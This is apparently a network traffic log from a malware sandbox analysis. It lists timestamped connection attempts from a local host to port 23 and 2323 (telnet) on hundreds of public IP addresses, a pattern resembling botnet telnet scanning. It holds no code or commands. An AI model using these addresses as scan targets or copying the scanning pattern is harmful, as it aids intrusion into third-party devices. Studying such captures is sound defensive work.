                                                              Dec 11, 2024 00:43:11.322485924 CET1020023192.168.2.23113.135.126.147
                                                              Dec 11, 2024 00:43:11.322504997 CET1020023192.168.2.235.108.33.79
                                                              Dec 11, 2024 00:43:11.322504997 CET1020023192.168.2.23201.168.36.69
                                                              Dec 11, 2024 00:43:11.322506905 CET1020023192.168.2.2395.249.107.62
                                                              Dec 11, 2024 00:43:11.322523117 CET1020023192.168.2.23194.254.99.110
                                                              Dec 11, 2024 00:43:11.322545052 CET1020023192.168.2.23158.151.60.245
                                                              Dec 11, 2024 00:43:11.322545052 CET1020023192.168.2.23124.217.54.138
                                                              Dec 11, 2024 00:43:11.322557926 CET102002323192.168.2.23156.178.153.80
                                                              Dec 11, 2024 00:43:11.322560072 CET1020023192.168.2.23103.64.213.240
                                                              Dec 11, 2024 00:43:11.322575092 CET1020023192.168.2.235.233.53.6
                                                              Dec 11, 2024 00:43:11.322580099 CET1020023192.168.2.23216.209.59.67
                                                              Dec 11, 2024 00:43:11.322582960 CET1020023192.168.2.2393.88.254.124
                                                              Dec 11, 2024 00:43:11.322594881 CET1020023192.168.2.2335.65.6.124
                                                              Dec 11, 2024 00:43:11.322601080 CET1020023192.168.2.2334.166.225.99
                                                              Dec 11, 2024 00:43:11.322602034 CET1020023192.168.2.23216.131.214.187
                                                              Dec 11, 2024 00:43:11.322617054 CET1020023192.168.2.23165.28.244.161
                                                              Dec 11, 2024 00:43:11.322621107 CET1020023192.168.2.23216.241.127.121
                                                              Dec 11, 2024 00:43:11.322624922 CET102002323192.168.2.2339.78.23.22
                                                              Dec 11, 2024 00:43:11.322634935 CET1020023192.168.2.23206.80.90.205
                                                              Dec 11, 2024 00:43:11.322634935 CET1020023192.168.2.23196.31.34.103
                                                              Dec 11, 2024 00:43:11.322643042 CET1020023192.168.2.2367.139.245.212
                                                              Dec 11, 2024 00:43:11.322654963 CET1020023192.168.2.23219.120.58.163
                                                              Dec 11, 2024 00:43:11.322658062 CET1020023192.168.2.23117.198.114.139
                                                              Dec 11, 2024 00:43:11.322670937 CET1020023192.168.2.23139.166.120.9
                                                              Dec 11, 2024 00:43:11.322670937 CET1020023192.168.2.2339.240.16.48
                                                              Dec 11, 2024 00:43:11.322685957 CET1020023192.168.2.23201.79.51.200
                                                              Dec 11, 2024 00:43:11.322686911 CET1020023192.168.2.231.39.24.53
                                                              Dec 11, 2024 00:43:11.322688103 CET102002323192.168.2.2389.26.245.215
                                                              Dec 11, 2024 00:43:11.322696924 CET1020023192.168.2.23223.118.27.82
                                                              Dec 11, 2024 00:43:11.322696924 CET1020023192.168.2.23195.246.4.39
                                                              Dec 11, 2024 00:43:11.322715044 CET1020023192.168.2.23167.105.131.23
                                                              Dec 11, 2024 00:43:11.322719097 CET1020023192.168.2.234.116.91.22
                                                              Dec 11, 2024 00:43:11.322729111 CET1020023192.168.2.23193.20.154.178
                                                              Dec 11, 2024 00:43:11.322729111 CET1020023192.168.2.2319.132.77.32
                                                              Dec 11, 2024 00:43:11.322748899 CET1020023192.168.2.23182.245.46.12
                                                              Dec 11, 2024 00:43:11.322752953 CET1020023192.168.2.23106.19.102.168
                                                              Dec 11, 2024 00:43:11.322757006 CET1020023192.168.2.23174.175.234.208
                                                              Dec 11, 2024 00:43:11.322772026 CET102002323192.168.2.2374.107.75.109
                                                              Dec 11, 2024 00:43:11.322772026 CET1020023192.168.2.23125.197.122.158
                                                              Dec 11, 2024 00:43:11.322786093 CET1020023192.168.2.2379.116.174.43
                                                              Dec 11, 2024 00:43:11.322787046 CET1020023192.168.2.23180.90.58.16
                                                              Dec 11, 2024 00:43:11.322787046 CET1020023192.168.2.2336.217.193.107
                                                              Dec 11, 2024 00:43:11.322803974 CET1020023192.168.2.23115.162.244.213
                                                              Dec 11, 2024 00:43:11.322805882 CET1020023192.168.2.23187.189.113.138
                                                              Dec 11, 2024 00:43:11.322822094 CET1020023192.168.2.23187.118.40.128
                                                              Dec 11, 2024 00:43:11.322824001 CET1020023192.168.2.23117.152.77.42
                                                              Dec 11, 2024 00:43:11.322824001 CET1020023192.168.2.23187.39.14.228
                                                              Dec 11, 2024 00:43:11.322839975 CET102002323192.168.2.23206.144.174.60
                                                              Dec 11, 2024 00:43:11.322839975 CET1020023192.168.2.231.100.12.77
                                                              Dec 11, 2024 00:43:11.322844982 CET1020023192.168.2.231.218.94.69
                                                              Dec 11, 2024 00:43:11.322856903 CET1020023192.168.2.23145.35.255.29
                                                              Dec 11, 2024 00:43:11.322860003 CET1020023192.168.2.2395.223.198.151
                                                              Dec 11, 2024 00:43:11.322863102 CET1020023192.168.2.235.155.109.212
                                                              Dec 11, 2024 00:43:11.322871923 CET1020023192.168.2.2341.242.246.95
                                                              Dec 11, 2024 00:43:11.322882891 CET1020023192.168.2.23116.222.45.22
                                                              Dec 11, 2024 00:43:11.322886944 CET1020023192.168.2.23110.11.56.154
                                                              Dec 11, 2024 00:43:11.322899103 CET1020023192.168.2.2392.168.33.76
                                                              Dec 11, 2024 00:43:11.322902918 CET102002323192.168.2.2373.92.104.1
                                                              Dec 11, 2024 00:43:11.322913885 CET1020023192.168.2.2394.3.21.147
                                                              Dec 11, 2024 00:43:11.322918892 CET1020023192.168.2.2366.116.161.167
                                                              Dec 11, 2024 00:43:11.322918892 CET1020023192.168.2.23200.112.89.247
                                                              Dec 11, 2024 00:43:11.322932959 CET1020023192.168.2.2317.13.33.168
                                                              Dec 11, 2024 00:43:11.322935104 CET1020023192.168.2.23161.110.50.183
                                                              Dec 11, 2024 00:43:11.322942972 CET1020023192.168.2.23206.60.205.118
                                                              Dec 11, 2024 00:43:11.322949886 CET1020023192.168.2.23116.222.214.46
                                                              Dec 11, 2024 00:43:11.322957039 CET1020023192.168.2.23122.68.99.228
                                                              Dec 11, 2024 00:43:11.322972059 CET102002323192.168.2.2368.95.86.78
                                                              Dec 11, 2024 00:43:11.322973013 CET1020023192.168.2.23222.80.207.148
                                                              Dec 11, 2024 00:43:11.322987080 CET1020023192.168.2.2345.95.77.60
                                                              Dec 11, 2024 00:43:11.322987080 CET1020023192.168.2.2385.226.225.179
                                                              Dec 11, 2024 00:43:11.322998047 CET1020023192.168.2.2347.115.55.35
                                                              Dec 11, 2024 00:43:11.323000908 CET1020023192.168.2.23109.222.85.206
                                                              Dec 11, 2024 00:43:11.323015928 CET1020023192.168.2.23168.169.90.228
                                                              Dec 11, 2024 00:43:11.323018074 CET1020023192.168.2.23149.242.79.56
                                                              Dec 11, 2024 00:43:11.323029041 CET1020023192.168.2.2331.26.119.1
                                                              Dec 11, 2024 00:43:11.323035002 CET1020023192.168.2.23206.52.21.64
                                                              Dec 11, 2024 00:43:11.323045969 CET1020023192.168.2.23133.57.37.227
                                                              Dec 11, 2024 00:43:11.323049068 CET102002323192.168.2.2377.187.218.133
                                                              Dec 11, 2024 00:43:11.323060989 CET1020023192.168.2.2385.100.153.237
                                                              Dec 11, 2024 00:43:11.323071003 CET1020023192.168.2.23185.201.45.211
                                                              Dec 11, 2024 00:43:11.323071957 CET1020023192.168.2.2379.243.56.6
                                                              Dec 11, 2024 00:43:11.323084116 CET1020023192.168.2.23157.250.161.208
                                                              Dec 11, 2024 00:43:11.323086977 CET1020023192.168.2.23117.153.134.75
                                                              Dec 11, 2024 00:43:11.323086977 CET1020023192.168.2.23158.225.109.29
                                                              Dec 11, 2024 00:43:11.323097944 CET1020023192.168.2.23109.103.175.147
                                                              Dec 11, 2024 00:43:11.323107004 CET1020023192.168.2.2353.94.33.31
                                                              Dec 11, 2024 00:43:11.323107004 CET1020023192.168.2.2340.107.226.26
                                                              Dec 11, 2024 00:43:11.323122025 CET102002323192.168.2.2331.155.87.22
                                                              Dec 11, 2024 00:43:11.323123932 CET1020023192.168.2.2342.220.105.207
                                                              Dec 11, 2024 00:43:11.323136091 CET1020023192.168.2.23110.96.229.82
                                                              Dec 11, 2024 00:43:11.323136091 CET102001023192.168.2.23102.11.67.215
                                                              Dec 11, 2024 00:43:11.323143959 CET1020023192.168.2.2394.61.220.212
                                                              Dec 11, 2024 00:43:11.323152065 CET1020023192.168.2.2348.27.107.174
                                                              Dec 11, 2024 00:43:11.323164940 CET1020023192.168.2.2391.181.69.27
                                                              Dec 11, 2024 00:43:11.323165894 CET1020023192.168.2.23130.26.134.137
                                                              Dec 11, 2024 00:43:11.323172092 CET1020023192.168.2.23187.176.177.126
                                                              Dec 11, 2024 00:43:11.323179960 CET1020023192.168.2.2357.221.78.185
                                                              Dec 11, 2024 00:43:11.323191881 CET102002323192.168.2.23189.170.117.121
                                                              Dec 11, 2024 00:43:11.323191881 CET1020023192.168.2.23136.49.122.45
                                                              Dec 11, 2024 00:43:11.323206902 CET1020023192.168.2.2376.96.125.230
                                                              Dec 11, 2024 00:43:11.323210955 CET1020023192.168.2.23105.151.12.247
                                                              Dec 11, 2024 00:43:11.323216915 CET1020023192.168.2.2340.42.60.40
                                                              Dec 11, 2024 00:43:11.323223114 CET1020023192.168.2.23136.240.167.182
                                                              Dec 11, 2024 00:43:11.323239088 CET1020023192.168.2.23179.242.205.6
                                                              Dec 11, 2024 00:43:11.323241949 CET1020023192.168.2.23218.5.88.246
                                                              Dec 11, 2024 00:43:11.323256969 CET1020023192.168.2.2388.237.39.188
                                                              Dec 11, 2024 00:43:11.323260069 CET1020023192.168.2.232.126.56.116
                                                              Dec 11, 2024 00:43:11.323265076 CET102002323192.168.2.238.74.7.33
                                                              Dec 11, 2024 00:43:11.323282003 CET1020023192.168.2.2343.141.177.226
                                                              Dec 11, 2024 00:43:11.323282003 CET1020023192.168.2.23105.235.46.18
                                                              Dec 11, 2024 00:43:11.323287964 CET1020023192.168.2.23153.227.18.168
                                                              Dec 11, 2024 00:43:11.323301077 CET1020023192.168.2.23157.221.143.13
                                                              Dec 11, 2024 00:43:11.323316097 CET1020023192.168.2.23167.132.230.141
                                                              Dec 11, 2024 00:43:11.323321104 CET1020023192.168.2.23133.50.209.120
                                                              Dec 11, 2024 00:43:11.323326111 CET1020023192.168.2.2357.169.22.159
                                                              Dec 11, 2024 00:43:11.323334932 CET1020023192.168.2.2389.236.99.18
                                                              Dec 11, 2024 00:43:11.323338985 CET1020023192.168.2.2381.245.247.90
                                                              Dec 11, 2024 00:43:11.323349953 CET102002323192.168.2.23111.225.44.87
                                                              Dec 11, 2024 00:43:11.323354959 CET1020023192.168.2.2392.100.70.34
                                                              Dec 11, 2024 00:43:11.323354959 CET1020023192.168.2.23196.162.168.164
                                                              Dec 11, 2024 00:43:11.323367119 CET1020023192.168.2.2318.122.242.128
                                                              Dec 11, 2024 00:43:11.323371887 CET1020023192.168.2.2367.167.11.13
                                                              Dec 11, 2024 00:43:11.323389053 CET1020023192.168.2.23180.226.87.179
                                                              Dec 11, 2024 00:43:11.323390007 CET1020023192.168.2.2360.251.30.171
                                                              Dec 11, 2024 00:43:11.323405027 CET1020023192.168.2.23148.67.85.54
                                                              Dec 11, 2024 00:43:11.323409081 CET1020023192.168.2.2358.220.62.138
                                                              Dec 11, 2024 00:43:11.323414087 CET1020023192.168.2.2381.144.182.219
                                                              Dec 11, 2024 00:43:11.442277908 CET2310200104.251.110.154192.168.2.23
                                                              Dec 11, 2024 00:43:11.442296982 CET102310200141.129.48.142192.168.2.23
                                                              Dec 11, 2024 00:43:11.442306042 CET231020044.111.254.137192.168.2.23
                                                              Dec 11, 2024 00:43:11.442346096 CET1020023192.168.2.23104.251.110.154
                                                              Dec 11, 2024 00:43:11.442347050 CET1020023192.168.2.2344.111.254.137
                                                              Dec 11, 2024 00:43:11.442353010 CET102001023192.168.2.23141.129.48.142
                                                              Dec 11, 2024 00:43:11.442375898 CET231020046.215.214.223192.168.2.23
                                                              Dec 11, 2024 00:43:11.442387104 CET2310200172.197.91.242192.168.2.23
                                                              Dec 11, 2024 00:43:11.442392111 CET23102009.123.18.50192.168.2.23
                                                              Dec 11, 2024 00:43:11.442400932 CET2310200119.111.212.100192.168.2.23
                                                              Dec 11, 2024 00:43:11.442405939 CET2310200213.252.116.99192.168.2.23
                                                              Dec 11, 2024 00:43:11.442414045 CET231020014.89.196.192192.168.2.23
                                                              Dec 11, 2024 00:43:11.442420006 CET1020023192.168.2.2346.215.214.223
                                                              Dec 11, 2024 00:43:11.442420959 CET1020023192.168.2.23172.197.91.242
                                                              Dec 11, 2024 00:43:11.442423105 CET2310200189.162.175.62192.168.2.23
                                                              Dec 11, 2024 00:43:11.442428112 CET23231020095.24.44.150192.168.2.23
                                                              Dec 11, 2024 00:43:11.442431927 CET231020036.148.138.142192.168.2.23
                                                              Dec 11, 2024 00:43:11.442431927 CET1020023192.168.2.239.123.18.50
                                                              Dec 11, 2024 00:43:11.442442894 CET2310200175.183.17.105192.168.2.23
                                                              Dec 11, 2024 00:43:11.442444086 CET1020023192.168.2.23119.111.212.100
                                                              Dec 11, 2024 00:43:11.442444086 CET1020023192.168.2.2314.89.196.192
                                                              Dec 11, 2024 00:43:11.442444086 CET1020023192.168.2.23189.162.175.62
                                                              Dec 11, 2024 00:43:11.442451000 CET23102004.50.127.153192.168.2.23
                                                              Dec 11, 2024 00:43:11.442454100 CET1020023192.168.2.23213.252.116.99
                                                              Dec 11, 2024 00:43:11.442454100 CET102002323192.168.2.2395.24.44.150
                                                              Dec 11, 2024 00:43:11.442456961 CET231020095.198.236.175192.168.2.23
                                                              Dec 11, 2024 00:43:11.442459106 CET1020023192.168.2.2336.148.138.142
                                                              Dec 11, 2024 00:43:11.442466021 CET231020098.11.249.175192.168.2.23
                                                              Dec 11, 2024 00:43:11.442473888 CET1020023192.168.2.234.50.127.153
                                                              Dec 11, 2024 00:43:11.442475080 CET231020053.214.202.121192.168.2.23
                                                              Dec 11, 2024 00:43:11.442480087 CET1020023192.168.2.23175.183.17.105
                                                              Dec 11, 2024 00:43:11.442483902 CET2310200222.57.119.34192.168.2.23
                                                              Dec 11, 2024 00:43:11.442490101 CET1020023192.168.2.2395.198.236.175
                                                              Dec 11, 2024 00:43:11.442493916 CET1020023192.168.2.2398.11.249.175
                                                              Dec 11, 2024 00:43:11.442501068 CET232310200124.131.110.203192.168.2.23
                                                              Dec 11, 2024 00:43:11.442508936 CET231020023.12.69.253192.168.2.23
                                                              Dec 11, 2024 00:43:11.442512989 CET1020023192.168.2.2353.214.202.121
                                                              Dec 11, 2024 00:43:11.442517042 CET1020023192.168.2.23222.57.119.34
                                                              Dec 11, 2024 00:43:11.442517996 CET231020034.84.41.173192.168.2.23
                                                              Dec 11, 2024 00:43:11.442526102 CET2310200120.100.185.168192.168.2.23
                                                              Dec 11, 2024 00:43:11.442537069 CET2310200180.232.34.67192.168.2.23
                                                              Dec 11, 2024 00:43:11.442537069 CET102002323192.168.2.23124.131.110.203
                                                              Dec 11, 2024 00:43:11.442540884 CET1020023192.168.2.2323.12.69.253
                                                              Dec 11, 2024 00:43:11.442544937 CET231020057.131.153.253192.168.2.23
                                                              Dec 11, 2024 00:43:11.442549944 CET1020023192.168.2.2334.84.41.173
                                                              Dec 11, 2024 00:43:11.442552090 CET23231020041.240.121.161192.168.2.23
                                                              Dec 11, 2024 00:43:11.442568064 CET1020023192.168.2.23120.100.185.168
                                                              Dec 11, 2024 00:43:11.442569017 CET1020023192.168.2.23180.232.34.67
                                                              Dec 11, 2024 00:43:11.442569017 CET2310200101.53.155.218192.168.2.23
                                                              Dec 11, 2024 00:43:11.442578077 CET1020023192.168.2.2357.131.153.253
                                                              Dec 11, 2024 00:43:11.442578077 CET102002323192.168.2.2341.240.121.161
                                                              Dec 11, 2024 00:43:11.442579031 CET2310200201.71.61.222192.168.2.23
                                                              Dec 11, 2024 00:43:11.442586899 CET2310200121.37.209.100192.168.2.23
                                                              Dec 11, 2024 00:43:11.442594051 CET2310200172.53.104.58192.168.2.23
                                                              Dec 11, 2024 00:43:11.442601919 CET2310200114.182.90.212192.168.2.23
                                                              Dec 11, 2024 00:43:11.442605972 CET1020023192.168.2.23101.53.155.218
                                                              Dec 11, 2024 00:43:11.442605972 CET1020023192.168.2.23201.71.61.222
                                                              Dec 11, 2024 00:43:11.442626953 CET1020023192.168.2.23121.37.209.100
                                                              Dec 11, 2024 00:43:11.442626953 CET1020023192.168.2.23172.53.104.58
                                                              Dec 11, 2024 00:43:11.442641020 CET1020023192.168.2.23114.182.90.212
                                                              Dec 11, 2024 00:43:11.442667007 CET231020063.94.223.162192.168.2.23
                                                              Dec 11, 2024 00:43:11.442677021 CET231020087.18.202.198192.168.2.23
                                                              Dec 11, 2024 00:43:11.442684889 CET2310200133.207.62.127192.168.2.23
                                                              Dec 11, 2024 00:43:11.442692995 CET2310200113.135.126.147192.168.2.23
                                                              Dec 11, 2024 00:43:11.442701101 CET1020023192.168.2.2387.18.202.198
                                                              Dec 11, 2024 00:43:11.442701101 CET231020095.249.107.62192.168.2.23
                                                              Dec 11, 2024 00:43:11.442709923 CET1020023192.168.2.23133.207.62.127
                                                              Dec 11, 2024 00:43:11.442709923 CET23102005.108.33.79192.168.2.23
                                                              Dec 11, 2024 00:43:11.442712069 CET1020023192.168.2.2363.94.223.162
                                                              Dec 11, 2024 00:43:11.442712069 CET1020023192.168.2.23113.135.126.147
                                                              Dec 11, 2024 00:43:11.442718983 CET2310200201.168.36.69192.168.2.23
                                                              Dec 11, 2024 00:43:11.442738056 CET1020023192.168.2.2395.249.107.62
                                                              Dec 11, 2024 00:43:11.442740917 CET1020023192.168.2.235.108.33.79
                                                              Dec 11, 2024 00:43:11.442754984 CET1020023192.168.2.23201.168.36.69
                                                              Dec 11, 2024 00:43:11.442966938 CET2310200194.254.99.110192.168.2.23
                                                              Dec 11, 2024 00:43:11.443002939 CET1020023192.168.2.23194.254.99.110
                                                              Dec 11, 2024 00:43:11.443041086 CET2310200158.151.60.245192.168.2.23
                                                              Dec 11, 2024 00:43:11.443052053 CET2310200124.217.54.138192.168.2.23
                                                              Dec 11, 2024 00:43:11.443069935 CET232310200156.178.153.80192.168.2.23
                                                              Dec 11, 2024 00:43:11.443078995 CET1020023192.168.2.23158.151.60.245
                                                              Dec 11, 2024 00:43:11.443079948 CET1020023192.168.2.23124.217.54.138
                                                              Dec 11, 2024 00:43:11.443080902 CET2310200103.64.213.240192.168.2.23
                                                              Dec 11, 2024 00:43:11.443090916 CET23102005.233.53.6192.168.2.23
                                                              Dec 11, 2024 00:43:11.443095922 CET2310200216.209.59.67192.168.2.23
                                                              Dec 11, 2024 00:43:11.443106890 CET102002323192.168.2.23156.178.153.80
                                                              Dec 11, 2024 00:43:11.443113089 CET231020093.88.254.124192.168.2.23
                                                              Dec 11, 2024 00:43:11.443121910 CET1020023192.168.2.23103.64.213.240
                                                              Dec 11, 2024 00:43:11.443121910 CET231020035.65.6.124192.168.2.23
                                                              Dec 11, 2024 00:43:11.443121910 CET1020023192.168.2.23216.209.59.67
                                                              Dec 11, 2024 00:43:11.443123102 CET1020023192.168.2.235.233.53.6
                                                              Dec 11, 2024 00:43:11.443135023 CET231020034.166.225.99192.168.2.23
                                                              Dec 11, 2024 00:43:11.443142891 CET2310200216.131.214.187192.168.2.23
                                                              Dec 11, 2024 00:43:11.443147898 CET1020023192.168.2.2393.88.254.124
                                                              Dec 11, 2024 00:43:11.443160057 CET1020023192.168.2.2335.65.6.124
                                                              Dec 11, 2024 00:43:11.443166018 CET1020023192.168.2.2334.166.225.99
                                                              Dec 11, 2024 00:43:11.443171024 CET2310200165.28.244.161192.168.2.23
                                                              Dec 11, 2024 00:43:11.443180084 CET2310200216.241.127.121192.168.2.23
                                                              Dec 11, 2024 00:43:11.443182945 CET1020023192.168.2.23216.131.214.187
                                                              Dec 11, 2024 00:43:11.443190098 CET23231020039.78.23.22192.168.2.23
                                                              Dec 11, 2024 00:43:11.443197966 CET2310200206.80.90.205192.168.2.23
                                                              Dec 11, 2024 00:43:11.443206072 CET2310200196.31.34.103192.168.2.23
                                                              Dec 11, 2024 00:43:11.443209887 CET1020023192.168.2.23216.241.127.121
                                                              Dec 11, 2024 00:43:11.443212032 CET1020023192.168.2.23165.28.244.161
                                                              Dec 11, 2024 00:43:11.443222046 CET1020023192.168.2.23206.80.90.205
                                                              Dec 11, 2024 00:43:11.443222046 CET102002323192.168.2.2339.78.23.22
                                                              Dec 11, 2024 00:43:11.443228960 CET231020067.139.245.212192.168.2.23
                                                              Dec 11, 2024 00:43:11.443238974 CET1020023192.168.2.23196.31.34.103
                                                              Dec 11, 2024 00:43:11.443248987 CET2310200219.120.58.163192.168.2.23
                                                              Dec 11, 2024 00:43:11.443258047 CET2310200117.198.114.139192.168.2.23
                                                              Dec 11, 2024 00:43:11.443267107 CET2310200139.166.120.9192.168.2.23
                                                              Dec 11, 2024 00:43:11.443278074 CET1020023192.168.2.23219.120.58.163
                                                              Dec 11, 2024 00:43:11.443279982 CET1020023192.168.2.2367.139.245.212
                                                              Dec 11, 2024 00:43:11.443281889 CET1020023192.168.2.23117.198.114.139
                                                              Dec 11, 2024 00:43:11.443301916 CET1020023192.168.2.23139.166.120.9
                                                              Dec 11, 2024 00:43:11.443344116 CET231020039.240.16.48192.168.2.23
                                                              Dec 11, 2024 00:43:11.443352938 CET2310200201.79.51.200192.168.2.23
                                                              Dec 11, 2024 00:43:11.443361044 CET23102001.39.24.53192.168.2.23
                                                              Dec 11, 2024 00:43:11.443368912 CET23231020089.26.245.215192.168.2.23
                                                              Dec 11, 2024 00:43:11.443377018 CET2310200223.118.27.82192.168.2.23
                                                              Dec 11, 2024 00:43:11.443378925 CET1020023192.168.2.2339.240.16.48
                                                              Dec 11, 2024 00:43:11.443383932 CET1020023192.168.2.23201.79.51.200
                                                              Dec 11, 2024 00:43:11.443384886 CET2310200195.246.4.39192.168.2.23
                                                              Dec 11, 2024 00:43:11.443387985 CET1020023192.168.2.231.39.24.53
                                                              Dec 11, 2024 00:43:11.443388939 CET2310200167.105.131.23192.168.2.23
                                                              Dec 11, 2024 00:43:11.443397999 CET23102004.116.91.22192.168.2.23
                                                              Dec 11, 2024 00:43:11.443397999 CET102002323192.168.2.2389.26.245.215
                                                              Dec 11, 2024 00:43:11.443414927 CET1020023192.168.2.23223.118.27.82
                                                              Dec 11, 2024 00:43:11.443414927 CET1020023192.168.2.23195.246.4.39
                                                              Dec 11, 2024 00:43:11.443418026 CET1020023192.168.2.23167.105.131.23
                                                              Dec 11, 2024 00:43:11.443430901 CET1020023192.168.2.234.116.91.22
                                                              Dec 11, 2024 00:43:11.443756104 CET2310200193.20.154.178192.168.2.23
                                                              Dec 11, 2024 00:43:11.443766117 CET231020019.132.77.32192.168.2.23
                                                              Dec 11, 2024 00:43:11.443773031 CET2310200182.245.46.12192.168.2.23
                                                              Dec 11, 2024 00:43:11.443780899 CET2310200106.19.102.168192.168.2.23
                                                              Dec 11, 2024 00:43:11.443784952 CET1020023192.168.2.23193.20.154.178
                                                              Dec 11, 2024 00:43:11.443799019 CET1020023192.168.2.2319.132.77.32
                                                              Dec 11, 2024 00:43:11.443804979 CET1020023192.168.2.23182.245.46.12
                                                              Dec 11, 2024 00:43:11.443809986 CET2310200174.175.234.208192.168.2.23
                                                              Dec 11, 2024 00:43:11.443815947 CET1020023192.168.2.23106.19.102.168
                                                              Dec 11, 2024 00:43:11.443820000 CET23231020074.107.75.109192.168.2.23
                                                              Dec 11, 2024 00:43:11.443829060 CET2310200125.197.122.158192.168.2.23
                                                              Dec 11, 2024 00:43:11.443835974 CET231020036.217.193.107192.168.2.23
                                                              Dec 11, 2024 00:43:11.443844080 CET231020079.116.174.43192.168.2.23
                                                              Dec 11, 2024 00:43:11.443850994 CET1020023192.168.2.23174.175.234.208
                                                              Dec 11, 2024 00:43:11.443850994 CET102002323192.168.2.2374.107.75.109
                                                              Dec 11, 2024 00:43:11.443851948 CET2310200180.90.58.16192.168.2.23
                                                              Dec 11, 2024 00:43:11.443866968 CET1020023192.168.2.23125.197.122.158
                                                              Dec 11, 2024 00:43:11.443870068 CET2310200115.162.244.213192.168.2.23
                                                              Dec 11, 2024 00:43:11.443875074 CET1020023192.168.2.2379.116.174.43
                                                              Dec 11, 2024 00:43:11.443876982 CET1020023192.168.2.2336.217.193.107
                                                              Dec 11, 2024 00:43:11.443881035 CET2310200187.189.113.138192.168.2.23
                                                              Dec 11, 2024 00:43:11.443885088 CET1020023192.168.2.23180.90.58.16
                                                              Dec 11, 2024 00:43:11.443890095 CET2310200187.118.40.128192.168.2.23
                                                              Dec 11, 2024 00:43:11.443907976 CET1020023192.168.2.23115.162.244.213
                                                              Dec 11, 2024 00:43:11.443912029 CET2310200117.152.77.42192.168.2.23
                                                              Dec 11, 2024 00:43:11.443913937 CET1020023192.168.2.23187.189.113.138
                                                              Dec 11, 2024 00:43:11.443922043 CET2310200187.39.14.228192.168.2.23
                                                              Dec 11, 2024 00:43:11.443922043 CET1020023192.168.2.23187.118.40.128
                                                              Dec 11, 2024 00:43:11.443931103 CET232310200206.144.174.60192.168.2.23
                                                              Dec 11, 2024 00:43:11.443944931 CET1020023192.168.2.23117.152.77.42
                                                              Dec 11, 2024 00:43:11.443948030 CET23102001.100.12.77192.168.2.23
                                                              Dec 11, 2024 00:43:11.443955898 CET23102001.218.94.69192.168.2.23
                                                              Dec 11, 2024 00:43:11.443960905 CET1020023192.168.2.23187.39.14.228
                                                              Dec 11, 2024 00:43:11.443962097 CET102002323192.168.2.23206.144.174.60
                                                              Dec 11, 2024 00:43:11.443964958 CET2310200145.35.255.29192.168.2.23
                                                              Dec 11, 2024 00:43:11.443979025 CET231020095.223.198.151192.168.2.23
                                                              Dec 11, 2024 00:43:11.443985939 CET1020023192.168.2.231.218.94.69
                                                              Dec 11, 2024 00:43:11.443988085 CET1020023192.168.2.231.100.12.77
                                                              Dec 11, 2024 00:43:11.444008112 CET1020023192.168.2.2395.223.198.151
                                                              Dec 11, 2024 00:43:11.444008112 CET1020023192.168.2.23145.35.255.29
                                                              Dec 11, 2024 00:43:11.444051981 CET23102005.155.109.212192.168.2.23
                                                              Dec 11, 2024 00:43:11.444062948 CET231020041.242.246.95192.168.2.23
                                                              Dec 11, 2024 00:43:11.444071054 CET2310200116.222.45.22192.168.2.23
                                                              Dec 11, 2024 00:43:11.444080114 CET2310200110.11.56.154192.168.2.23
                                                              Dec 11, 2024 00:43:11.444087982 CET231020092.168.33.76192.168.2.23
                                                              Dec 11, 2024 00:43:11.444089890 CET1020023192.168.2.235.155.109.212
                                                              Dec 11, 2024 00:43:11.444089890 CET1020023192.168.2.2341.242.246.95
                                                              Dec 11, 2024 00:43:11.444092035 CET23231020073.92.104.1192.168.2.23
                                                              Dec 11, 2024 00:43:11.444102049 CET231020094.3.21.147192.168.2.23
                                                              Dec 11, 2024 00:43:11.444103956 CET1020023192.168.2.23116.222.45.22
                                                              Dec 11, 2024 00:43:11.444112062 CET231020066.116.161.167192.168.2.23
                                                              Dec 11, 2024 00:43:11.444123030 CET1020023192.168.2.23110.11.56.154
                                                              Dec 11, 2024 00:43:11.444125891 CET1020023192.168.2.2392.168.33.76
                                                              Dec 11, 2024 00:43:11.444125891 CET102002323192.168.2.2373.92.104.1
                                                              Dec 11, 2024 00:43:11.444142103 CET1020023192.168.2.2394.3.21.147
                                                              Dec 11, 2024 00:43:11.444145918 CET1020023192.168.2.2366.116.161.167
                                                              Dec 11, 2024 00:43:11.444154024 CET2310200200.112.89.247192.168.2.23
                                                              Dec 11, 2024 00:43:11.444163084 CET2310200161.110.50.183192.168.2.23
                                                              Dec 11, 2024 00:43:11.444170952 CET231020017.13.33.168192.168.2.23
                                                              Dec 11, 2024 00:43:11.444180965 CET2310200206.60.205.118192.168.2.23
                                                              Dec 11, 2024 00:43:11.444189072 CET2310200116.222.214.46192.168.2.23
                                                              Dec 11, 2024 00:43:11.444195032 CET1020023192.168.2.23200.112.89.247
                                                              Dec 11, 2024 00:43:11.444195986 CET1020023192.168.2.23161.110.50.183
                                                              Dec 11, 2024 00:43:11.444199085 CET231020057.169.22.159192.168.2.23
                                                              Dec 11, 2024 00:43:11.444214106 CET1020023192.168.2.2317.13.33.168
                                                              Dec 11, 2024 00:43:11.444214106 CET1020023192.168.2.23206.60.205.118
                                                              Dec 11, 2024 00:43:11.444226027 CET1020023192.168.2.2357.169.22.159
                                                              Dec 11, 2024 00:43:11.444231033 CET1020023192.168.2.23116.222.214.46
                                                              Dec 11, 2024 00:43:11.653367996 CET43928443192.168.2.2391.189.91.42
                                                              Dec 11, 2024 00:43:12.312748909 CET102001023192.168.2.2397.105.134.232
                                                              Dec 11, 2024 00:43:12.312748909 CET1020023192.168.2.23166.168.67.202
                                                              Dec 11, 2024 00:43:12.312762022 CET1020023192.168.2.23195.184.165.30
                                                              Dec 11, 2024 00:43:12.312782049 CET1020023192.168.2.23126.64.143.168
                                                              Dec 11, 2024 00:43:12.312782049 CET1020023192.168.2.23192.26.15.12
                                                              Dec 11, 2024 00:43:12.312783003 CET1020023192.168.2.23111.168.143.117
                                                              Dec 11, 2024 00:43:12.312786102 CET1020023192.168.2.2345.225.67.236
                                                              Dec 11, 2024 00:43:12.312789917 CET1020023192.168.2.2312.144.206.112
                                                              Dec 11, 2024 00:43:12.312798023 CET1020023192.168.2.23121.94.147.254
                                                              Dec 11, 2024 00:43:12.312813997 CET1020023192.168.2.232.133.46.12
                                                              Dec 11, 2024 00:43:12.312824965 CET102002323192.168.2.23183.241.16.161
                                                              Dec 11, 2024 00:43:12.312824965 CET1020023192.168.2.23172.96.175.178
                                                              Dec 11, 2024 00:43:12.312824965 CET1020023192.168.2.2377.53.194.251
                                                              Dec 11, 2024 00:43:12.312836885 CET1020023192.168.2.232.113.191.48
                                                              Dec 11, 2024 00:43:12.312841892 CET1020023192.168.2.23149.179.27.188
                                                              Dec 11, 2024 00:43:12.312848091 CET1020023192.168.2.2386.187.94.247
